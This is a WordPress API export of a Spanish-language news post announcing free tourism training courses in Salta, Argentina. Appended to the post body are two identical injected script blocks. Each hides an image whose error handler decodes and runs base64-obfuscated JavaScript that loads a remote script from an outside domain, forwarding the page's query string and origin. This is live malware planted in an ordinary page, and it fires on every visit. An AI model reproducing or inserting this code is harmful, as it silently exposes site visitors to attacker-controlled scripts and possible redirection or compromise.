{"id":2485,"date":"2023-04-10T11:02:34","date_gmt":"2023-04-10T14:02:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2485"},"modified":"2025-08-14T00:19:29","modified_gmt":"2025-08-14T03:19:29","slug":"se-encuentran-abiertas-las-inscripciones-para-los-cursos-de-capacitacion-en-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2485","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-encuentran-abiertas-las-inscripciones-para-los-cursos-de-capacitacion-en-turismo-88987\">Se encuentran abiertas las inscripciones para los cursos de capacitaci\u00f3n en turismo<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#6f0922\"><em>Los cursos organizados por el Ministerio de Turismo y Deportes son gratuitos y est\u00e1n destinados a estudiantes secundarios y a los diversos sectores tur\u00edsticos. En la web www.turismotecapacita.com se debe registrar inscripci\u00f3n.<\/em><\/h4>\n\n\n\n<p>La capacitaci\u00f3n organizada por el Ministerio de Turismo y Deportes contin\u00faa en abril con numerosos cursos para estudiantes secundarios y los diversos sectores tur\u00edsticos. Los cursos son gratuitos y se debe registrar inscripci\u00f3n en&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">http:\/\/www.turismotecapacita.com<\/a><\/p>\n\n\n\n<p>A partir de la segunda semana de abril se llevar\u00e1 a cabo la Unidad II de Ferias con Identidad. Organizaci\u00f3n y Desarrollo Integral que se realiza online, la capacitaci\u00f3n, a cargo de Marcela Ruiz y destinada a organizadores de Ferias de los municipios, &nbsp;continuar\u00e1 el lunes 10, 17 y 24.<\/p>\n\n\n\n<p>En tanto, el mi\u00e9rcoles 12 Informantes y prestadores de turismo locales, gu\u00edas y anfitriones locales de los municipios de Campo Quijano, La Caldera, La Vi\u00f1a, Guachipas, Aguaray, Seclant\u00e1s y El Galp\u00f3n podr\u00e1n participar de manera on line del curso Desarrollo de Circuitos Innovadores, este curso se realizar\u00e1 el mi\u00e9rcoles 19 y el mi\u00e9rcoles 26. &nbsp;<\/p>\n\n\n\n<p>Por otra parte, estudiantes de Nivel Secundario podr\u00e1n participar en la 2da semana del mes de de la capacitaci\u00f3n J\u00f3venes comprometidos con el desarrollo sostenible.&nbsp;En la misma fecha, Felipe Omar Vera Soto, especialista en turismo sostenible, representante en Chile de Green Destinations y divulgador de programas de UNWTO Academy, dictar\u00e1 la Sostenibilidad de los Destinos Tur\u00edsticos. &nbsp;<\/p>\n\n\n\n<p>El Dr. Rodolfo Pastore dictar\u00e1 la capacitaci\u00f3n Primeros Auxilios Nivel I y II, destinada a los Prestadores de Turismo y Gu\u00edas, la actividad se realizar\u00e1 el 20 y 21 de abril Salta Capital y en el interior el 27 y 28 de abril. Son jornadas presenciales. Asimismo, se podr\u00e1 realizar, el curso El Poder de los Detalles; es una propuesta de trabajo de 8 semanas que inicia el 25 de abril; en este curso se acompa\u00f1a a los emprendedores de manera personalizada,a trav\u00e9s de mentor\u00edas y capacitaciones, de forma de identificar sus problem\u00e1ticas y colaborar desde la asistencia t\u00e9cnica logrando peque\u00f1os cambios y mejoras.<\/p>\n\n\n\n<p>Abril finaliza con el curso Mujeres, Turismo y Desarrollo Sostenible a cargo de la Lic. Mariana Massachesi, ONU Mujeres; la actividad, destinada prestadores del sector tur\u00edstico p\u00fablico y privado, comenzar\u00e1 el 26 de abril y continuar\u00e1 en mayo.&nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-encuentran-abiertas-las-inscripciones-para-los-cursos-de-capacitacion-en-turismo-88987\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los cursos organizados por el Ministerio de Turismo y Deportes son gratuitos y est\u00e1n destinados a estudiantes secundarios y a los diversos sectores tur\u00edsticos. En la web www.turismotecapacita.com se debe registrar inscripci\u00f3n. La capacitaci\u00f3n organizada por el Ministerio de Turismo y Deportes contin\u00faa en abril con numerosos cursos para estudiantes secundarios y los diversos sectores [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2486,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-2485","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2485"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2485"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2485\/revisions"}],"predecessor-version":[{"id":7121,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2485\/revisions\/7121"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2486"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2485"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2485"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2485"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}